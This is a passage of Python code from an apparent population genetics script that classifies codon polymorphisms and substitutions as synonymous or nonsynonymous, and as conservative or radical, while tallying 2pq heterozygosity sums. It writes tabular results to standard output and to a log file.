sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sum2PQ_S += twoPQ1
sum2PQ_N += twoPQ2
synS += 1
nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ2
else:
rad1S += 1
sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ2
else:
rad2S += 1
sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ2
else:
rad3S += 1
sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ2
else:
rad4S += 1
sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ2
else:
rad5S += 1
sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ2
else:
rad6S += 1
sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ2
else:
rad7S += 1
sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ2
else:
meanRadS += 1
sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
nsynS += 1
synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sum2PQ_S += twoPQ2
sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ1
else:
rad1S += 1
sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ1
else:
rad2S += 1
sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ1
else:
rad3S += 1
sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ1
else:
rad4S += 1
sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ1
else:
rad5S += 1
sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ1
else:
rad6S += 1
sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ1
else:
rad7S += 1
sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ1
else:
meanRadS += 1
sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ1
else:
rad1S += 1
sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ1
else:
rad2S += 1
sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ1
else:
rad3S += 1
sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ1
else:
rad4S += 1
sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ1
else:
rad5S += 1
sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ1
else:
rad6S += 1
sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ1
else:
rad7S += 1
sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ1
else:
meanRadS += 1
sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ2
else:
rad1S += 1
sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ2
else:
rad2S += 1
sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ2
else:
rad3S += 1
sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ2
else:
rad4S += 1
sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ2
else:
rad5S += 1
sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ2
else:
rad6S += 1
sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ2
else:
rad7S += 1
sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ2
else:
meanRadS += 1
sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0])
for aa in aaList:
sys.stdout.write(';' + aa)
sys.stdout.write('\tP\tN\n')
if len(aaList) > 1:
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
else:
mutType = ''
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + aaList[0])
for aa in aaList:
logfile.write(';' + aa)
logfile.write('\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0])
for aa in aaList:
sys.stdout.write(';' + aa)
sys.stdout.write('\tP\tN\n')
if len(aaList) > 1:
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
else:
mutType = ''
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + aaList[0])
for aa in aaList:
logfile.write(';' + aa)
logfile.write('\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
else:
if ab > ac and ab > bc:
codonList1 = [codonC,codonB]
codonList2 = [codonC,codonA]
elif ac > ab and ac > bc:
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
elif bc > ab and bc > ac:
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
aaList1 = []
aaList2 = []
for comp in codonList1:
if i < 3:
if comp in startCodons:
aaList1.append('M')
else:
aaList1.append(geneticCode[comp])
else:
aaList1.append(geneticCode[comp])
for comp in codonList2:
if i < 3:
if comp in startCodons:
aaList2.append('M')
else:
aaList2.append(geneticCode[comp])
else:
aaList2.append(geneticCode[comp])
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sum2PQ_S += twoPQ
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sum2PQ_S += twoPQ1
sum2PQ_N += twoPQ2
synS += 1
nsynS += 1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList1[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ2
else:
rad1S += 1
sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ2
else:
rad2S += 1
sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ2
else:
rad3S += 1
sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ2
else:
rad4S += 1
sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ2
else:
rad5S += 1
sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ2
else:
rad6S += 1
sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ2
else:
rad7S += 1
sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ2
else:
meanRadS += 1
sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif aaList2[0] == aaList2[1]:
nsynS += 1
synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sum2PQ_S += twoPQ2
sum2PQ_N += twoPQ1
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ2) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ1
else:
rad1S += 1
sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ1
else:
rad2S += 1
sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ1
else:
rad3S += 1
sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ1
else:
rad4S += 1
sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ1
else:
rad5S += 1
sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ1
else:
rad6S += 1
sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ1
else:
rad7S += 1
sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ1
else:
meanRadS += 1
sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
else:
nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
sum2PQ_N += twoPQ1 + twoPQ2
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList1[0] + ',freq=' + str(currFreqDict[codonList1[0]]))
for codon in codonList1[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ1
else:
rad1S += 1
sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ1
else:
rad2S += 1
sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ1
else:
rad3S += 1
sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ1
else:
rad4S += 1
sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ1
else:
rad5S += 1
sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ1
else:
rad6S += 1
sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ1
else:
rad7S += 1
sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ1
else:
meanRadS += 1
sum2PQ_meanR += twoPQ1
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ1) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + codonList2[0] + ',freq=' + str(currFreqDict[codonList2[0]]))
for codon in codonList2[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList2[0] + ';' + aaList2[1] + '\tP\tN')
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
con1S += 1
sum2PQ_C1 += twoPQ2
else:
rad1S += 1
sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
con2S += 1
sum2PQ_C2 += twoPQ2
else:
rad2S += 1
sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
con3S += 1
sum2PQ_C3 += twoPQ2
else:
rad3S += 1
sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
con4S += 1
sum2PQ_C4 += twoPQ2
else:
rad4S += 1
sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
con5S += 1
sum2PQ_C5 += twoPQ2
else:
rad5S += 1
sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
con6S += 1
sum2PQ_C6 += twoPQ2
else:
rad6S += 1
sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
con7S += 1
sum2PQ_C7 += twoPQ2
else:
rad7S += 1
sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
meanConS += 1
sum2PQ_meanC += twoPQ2
else:
meanRadS += 1
sum2PQ_meanR += twoPQ2
for item in mutType[0:-1]:
if item == 0:
sys.stdout.write('\tC')
else:
sys.stdout.write('\tR')
sys.stdout.write('\t' +str(mutType[-1]) + '\t' + str(twoPQ2) + '\n')
elif len(currAlleleDict) == 2:
currFreqDict = {}
twoPQ = 2
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
twoPQ *= freq
currFreqDict[codon] = freq
if len(aaList) == 1:
synS += 2
sum2PQ_S += (2*twoPQ)
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + '\tP\tS\t-\t-\t-\t-\t-\t-\t-\t-\t' + str(twoPQ) + '\n')
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + aaList[0] + ';' + aaList[1] + '\tP\tN\n')
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + aaList[0] + ';' + aaList[1] + '\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
else:
sys.stdout.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
sys.stdout.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
sys.stdout.write('\t' + ';'.join(aaList) + '\tP\tN\n')
if len(aaList) > 1:
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
else:
mutType = ''
logfile.write(str(gene) + '\t' + str(variableSites[0] + 1) + '\t' + str(i + 1) + '\t' + currAlleleList[0] + ',freq=' + str(currFreqDict[currAlleleList[0]]))
for codon in currAlleleList[1:]:
logfile.write(';' + codon + ',freq=' + str(currFreqDict[codon]))
logfile.write('\t' + ';'.join(aaList))
logfile.write('\tP\tN\t' + str(mutType) + '\t' + outCodon + '\n')
i += 1
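# Divergence: count fixed differences between the reference (refSeq) and
# outgroup (outSeq) sequences at sites that are invariant within the population.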
logfile.write('\nTotal substitutions\n\n')
sys.stdout.write('\n\nTotal Substitutions\nGene\tSite\tCodon\tAlleles\tAAs\tPol/Div\tMutation Type\t1\t2\t3\t4\t5\t6\t7\tC/R Index\n')
codonList = []
dS = 0
dN = 0
dC1 = 0
dC2 = 0
dC3 = 0
dC4 = 0
dC5 = 0
dC6 = 0
dC7 = 0
dR1 = 0
dR2 = 0
dR3 = 0
dR4 = 0
dR5 = 0
dR6 = 0
dR7 = 0
dMeanC = 0
dMeanR = 0
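# For each invariant site where the reference and outgroup nucleotides differ,
# classify the codon change as synonymous or nonsynonymous and, if
# nonsynonymous, as conservative (C) or radical (R) under each of the 7 criteria.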
for site in popInvariantSites:
gene = False
for locus in positionDict:
start = locus[0]
stop = locus[1]
if site >= start and site <= stop:
gene = positionDict[locus]
if site%3 == 0:
site1 = site
site2 = site + 1
site3 = site + 2
elif site%3 == 1:
site1 = site - 1
site2 = site
site3 = site + 1
elif site%3 == 2:
site1 = site - 2
site2 = site - 1
site3 = site
inNuc = refSeq[site]
outNuc = outSeq[site]
inSite = refSeq[site1:site3+1]
outSite = outSeq[site1:site3+1]
if inNuc != outNuc and 'N' not in inSite and 'N' not in outSite and '-' not in inSite and '-' not in outSite and site/3 not in codonList:
codonList.append(site/3)
aaList = []
if site < 3 and inSite in startCodons:
aaList.append('M')
inAA = 'M'
else:
aaList.append(geneticCode[inSite])
inAA = geneticCode[inSite]
if site < 3 and outSite in startCodons:
if 'M' not in aaList:
aaList.append('M')
outAA = 'M'
elif geneticCode[outSite] not in aaList:
outAA = geneticCode[outSite]
aaList.append(geneticCode[outSite])
else:
outAA = geneticCode[outSite]
if site1 in popPolymorphicSites or site2 in popPolymorphicSites or site3 in popPolymorphicSites:
logfile.write('Codon ' + str((site/3) + 1) + ' has one or more polymorphic sites\n\t' + inSite + ',' + outSite + '\t' + inAA + ',' + outAA + '\n')
sys.stdout.write(str(gene) + '\t' + str(site + 1) + '\t' + str((site/3) + 1) + '\t' + inSite + ',' + outSite + '\t' + inAA + ',' + outAA + '\tD\t\t\t\t\t\t\t\t\t\n')
else:
site1List = [inSite[0]]
site2List = [inSite[1]]
site3List = [inSite[2]]
if outSite[0] not in site1List:
site1List.append(outSite[0])
if outSite[1] not in site2List:
site2List.append(outSite[1])
if outSite[2] not in site3List:
site3List.append(outSite[2])
totalChanges = (len(site1List) - 1) + (len(site2List) - 1) + (len(site3List) - 1)
if totalChanges == 1:
sys.stdout.write(str(gene) + '\t' + str(site + 1) + '\t' + str((site/3) + 1) + '\t' + inSite + ';' + outSite)
if len(aaList) == 2:
dN += 1
sys.stdout.write('\t' + aaList[0] + ';' + aaList[1] + '\tD\tN')
mutType = CRI(aaList)
for item in mutType:
sys.stdout.write('\t' + str(item))
sys.stdout.write('\n')
if mutType[0] == 0:
dC1 += 1
else:
dR1 += 1
if mutType[1] == 0:
dC2 += 1
else:
dR2 += 1
if mutType[2] == 0:
dC3 += 1
else:
dR3 += 1
if mutType[3] == 0:
dC4 += 1
else:
dR4 += 1
if mutType[4] == 0:
dC5 += 1
else:
dR5 += 1
if mutType[5] == 0:
dC6 += 1
else:
dR6 += 1
if mutType[6] == 0:
dC7 += 1
else:
dR7 += 1
if mutType[7] <= 0.5:
dMeanC += 1
else:
dMeanR += 1
else:
dS += 1
sys.stdout.write('\t-\tD\tS\t-\t-\t-\t-\t-\t-\t-\t-\n')
else:
if len(aaList) == 2:
mutType = CRI(aaList)
logfile.write('Codon ' + str((site/3) + 1) + ' has a complex evolutionary history\n\t' + inSite + ',' + outSite + '\t' + inAA + ',' + outAA + '\t' + str(mutType) + '\n')
sys.stdout.write(str(gene) + '\t' + str(site + 1) + '\t' + str((site/3) + 1) + '\t' + inSite + ',' + outSite + '\t' + inAA + ',' + outAA + '\tD\t\t\t\t\t\t\t\t\t\n')
else:
logfile.write('Codon ' + str((site/3) + 1) + ' has a complex evolutionary history\n\t' + inSite + ',' + outSite + '\t' + inAA + ',' + outAA + '\n')
sys.stdout.write(str(gene) + '\t' + str(site + 1) + '\t' + str((site/3) + 1) + '\t' + inSite + ',' + outSite + '\t' + inAA + ',' + outAA + '\tD\tS\t\t\t\t\t\t\t\t\n')
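# Convert the population-wide tallies to strings for the summary output.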
sum2PQ_S = str(sum2PQ_S)
sum2PQ_N = str(sum2PQ_N)
sum2PQ_C1 = str(sum2PQ_C1)
sum2PQ_C2 = str(sum2PQ_C2)
sum2PQ_C3 = str(sum2PQ_C3)
sum2PQ_C4 = str(sum2PQ_C4)
sum2PQ_C5 = str(sum2PQ_C5)
sum2PQ_C6 = str(sum2PQ_C6)
sum2PQ_C7 = str(sum2PQ_C7)
sum2PQ_R1 = str(sum2PQ_R1)
sum2PQ_R2 = str(sum2PQ_R2)
sum2PQ_R3 = str(sum2PQ_R3)
sum2PQ_R4 = str(sum2PQ_R4)
sum2PQ_R5 = str(sum2PQ_R5)
sum2PQ_R6 = str(sum2PQ_R6)
sum2PQ_R7 = str(sum2PQ_R7)
sum2PQ_meanC = str(sum2PQ_meanC)
sum2PQ_meanR = str(sum2PQ_meanR)
synS = str(synS)
nsynS = str(nsynS)
con1S = str(con1S)
con2S = str(con2S)
con3S = str(con3S)
con4S = str(con4S)
con5S = str(con5S)
con6S = str(con6S)
con7S = str(con7S)
meanConS = str(meanConS)
rad1S = str(rad1S)
rad2S = str(rad2S)
rad3S = str(rad3S)
rad4S = str(rad4S)
rad5S = str(rad5S)
rad6S = str(rad6S)
rad7S = str(rad7S)
meanRadS = str(meanRadS)
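# --- Polymorphisms scored within the sexual individuals (sexList) only ---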
logfile.write('Sex polymorphisms\n')
sys.stdout.write('\n\nSex Polymorphisms\nGene\tSite\tCodon\tAlleles\tAAs\tPol/Div\tMutation Type\t1\t2\t3\t4\t5\t6\t7\tC/R Index\t2*pq\n')
sex_sum2PQ_S = 0
sex_sum2PQ_N = 0
sex_sum2PQ_C1 = 0
sex_sum2PQ_C2 = 0
sex_sum2PQ_C3 = 0
sex_sum2PQ_C4 = 0
sex_sum2PQ_C5 = 0
sex_sum2PQ_C6 = 0
sex_sum2PQ_C7 = 0
